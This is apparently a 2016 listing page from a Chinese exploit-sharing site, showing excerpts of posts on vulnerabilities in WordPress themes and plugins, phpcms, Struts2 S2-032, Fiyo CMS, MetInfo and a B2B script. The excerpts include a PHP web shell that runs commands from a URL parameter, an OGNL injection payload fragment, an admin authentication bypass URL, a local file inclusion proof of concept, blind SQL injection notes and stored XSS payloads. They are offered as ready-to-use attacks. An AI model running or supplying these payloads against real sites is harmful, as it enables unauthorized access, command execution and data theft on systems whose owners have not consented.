• WordPress Karma 4.7 – Responsive Theme Exploit

    WordPress Karma 4.7 – Responsive Theme Exploit
    <?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]  */     require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/s...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:1,942次| 标签:
  • 绕过PHP5.2.X的安全模式

    绕过PHP5.2.X的安全模式
    php版本小于等于5.2.* <?php         //Exploit Code         system('\dir');         system('\net user');         print passthru ('\ipconfig');         exec('\whoami',$a);         print_r($a);         //Shell Script         //shell.php?cmd=net user         $cmd = '\\'.$_GET['cmd'];         system($cmd); ?>
    作者:unhonker| 发布:2016年5月13日 | 分类:漏洞公布 | 被撸:1,995次| 标签:
  • Alibaba Clone B2B Script管理身份绕过漏洞

    Alibaba Clone B2B Script管理身份绕过漏洞
    # Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass # Vendor Homepage: [url]http://alibaba-clone.com/[/url] # Version: All Versions     Exploit : For enter , simply enter the following code http://server/admin/adminhome.php?tmp=1     For each page is enough to add the following code to the end of url example see page...
    作者:unhonker| 发布:2016年5月05日 | 分类:漏洞公布 | 被撸:2,672次|
  • Struts2-032漏洞利用工具

    Struts2-032漏洞利用工具
    转载自shack2 新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。 顺便分享下我改写的exp: S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924 获取磁盘目录: 1. method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org...
    作者:unhonker| 发布:2016年4月26日 | 分类:漏洞公布 | 被撸:2,995次| 标签:
  • 青云客博客cms某处盲注

    青云客博客cms某处盲注
    延时注入,写代码受网速影响比较严重,网速不稳的话,可能误差比较大,当然,你可以适当把sleep数字搞大些,freebuf上面有一个转换成二进制,然后再开8个线程跑数据的思路,这里我就不写了。 在include/class_temp.php中 function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='titl...
    作者:unhonker| 发布:2016年4月15日 | 分类:漏洞公布 | 被撸:2,085次| 标签:
  • phpcmsV9.6 getshell

    phpcmsV9.6 getshell
    这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。 详细说明: PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修...
    作者:unhonker| 发布:2016年3月22日 | 分类:漏洞公布 | 被撸:5,642次| 标签:
  • WordPress Abtest本地文件包含漏洞

    WordPress Abtest本地文件包含漏洞
    出现漏洞的文件为:abtest_admin.php <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experiments.php'; } ?> # PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
    作者:unhonker| 发布:2016年3月22日 | 分类:漏洞公布 | 被撸:2,815次| 标签:
  • Fiyo CMS 2.0.2.1 XSS漏洞

    Fiyo CMS 2.0.2.1 XSS漏洞
    *3. Affected Modules* Affected fields in the modules are listed below: i. Users User Group -> Group Name, Description ii. Modules Module Details->Judul Modul, Posisi iii. Menus Main Menu-> Menu Details->Nama Footer Menu-> Menu Details->Nama Categories->Menu Details->Judul Kategori Admin Panel-> ...
    作者:unhonker| 发布:2016年2月25日 | 分类:漏洞公布 | 被撸:1,517次| 标签:
  • MetInfo 5.3.3一处XSS

    MetInfo 5.3.3一处XSS
    比较鸡肋的一处XSS 漏洞细节: 后台——用户——管理员——编辑——在“姓名一栏”里插入代码 <script>alert('XSS')</script> 最后一步——保存
    作者:unhonker| 发布:2016年1月08日 | 分类:漏洞公布 | 被撸:2,078次| 标签: